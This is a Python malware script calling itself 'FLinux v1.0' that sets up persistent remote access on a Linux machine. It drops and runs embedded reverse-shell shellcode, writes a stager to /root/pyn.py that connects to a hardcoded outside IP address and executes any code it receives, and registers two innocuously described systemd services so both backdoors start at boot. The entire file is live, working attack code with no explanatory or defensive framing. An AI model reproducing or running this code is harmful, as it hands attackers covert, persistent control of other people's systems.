import os

s = os.system("su matlab\nmatlab");
# PORT 8194->python meterpreter_reverse_tcp 8193->Python reverse_tcp 8195->linux_reverse_shell


class GetShell:
    def __init__(self):
        print("Welcome to FLinux v1.0, Lets get a Shell now...")
        return 

    def linux_reverseTcp(self):
        i8195 = '\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00>\x00\x01\x00\x00\x00x\x00@\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\xf9\x00\x00\x00\x00\x00\x00\x00z\x01\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00H1\xffj\tX\x99\xb6\x10H\x89\xd6M1\xc9j"AZ\xb2\x07\x0f\x05H\x85\xc0xRj\nAYVPj)X\x99j\x02_j\x01^\x0f\x05H\x85\xc0x;H\x97H\xb9\x02\x00 \x03\r\xe8\xc2oQH\x89\xe6j\x10Zj*X\x0f\x05YH\x85\xc0y%I\xff\xc9t\x18Wj#Xj\x00j\x05H\x89\xe7H1\xf6\x0f\x05YY_H\x85\xc0y\xc7j<Xj\x01_\x0f\x05^Z\x0f\x05H\x85\xc0x\xef\xff\xe6'
        f = open("lrt", "wb")
        f.write(i8195)
        f.close()
        os.system("chmod +x lrt\n./lrt")

        f = open("/root/pyn.sh", "wb")
        s = """#!/bin/sh\npython -c "import os;os.system('./lrt')" """
        f.write(s)
        f.close()
        os.system("chmod +x /root/pyn.sh")

    def python_meterpreter_reverseTcp(self):
        i8194 = "import socket,struct,time\no = 5\nwhile True:\n\twhile True:\n\t\ttry:\n\t\t\ts=socket.socket(2,socket.SOCK_STREAM)\n\t\t\ts.connect(('13.232.194.111',8194))\n\t\t\tbreak\n\t\texcept:\n\t\t\ttime.sleep(o)\n\tl=struct.unpack('>I',s.recv(4))[0]\n\td=s.recv(l)\n\twhile len(d)<l:\n\t\td+=s.recv(l-len(d))\n\texec(d,{'s':s})\n\to = 50\n\ttime.sleep(o)"
        os.system('echo """'+i8194+'""" > /root/pyn.py\nchmod +x /root/pyn.py')

    def set_onStartup(self):
        f = open("/lib/systemd/system/pyn.service", "wb")   # Python Reverse Meterpreter shell
        s = "[Unit]\nDescription=Something Special Again\nType=idle\n\n[Service]\nExecStart=/usr/bin/python /root/pyn.py\n\n[Install]\nWantedBy=multi-user.target"
        f.write(s)
        f.close()
        os.system("chmod 664 /lib/systemd/system/pyn.service\nsystemctl daemon-reload\nsystemctl enable pyn.service")

        f = open("/lib/systemd/system/pyns.service", "wb")  # Linux Generic Shell<Backup>
        s = "[Unit]\nDescription=Something Special\nType=idle\n\n[Service]\nExecStart=/root/pyn.sh\n\n[Install]\nWantedBy=multi-user.target"
        f.write(s)
        f.close()
        os.system("chmod 664 /lib/systemd/system/pyns.service\nsystemctl daemon-reload\nsystemctl enable pyns.service")


s = GetShell();
s.linux_reverseTcp();
s.python_meterpreter_reverseTcp();
s.set_onStartup();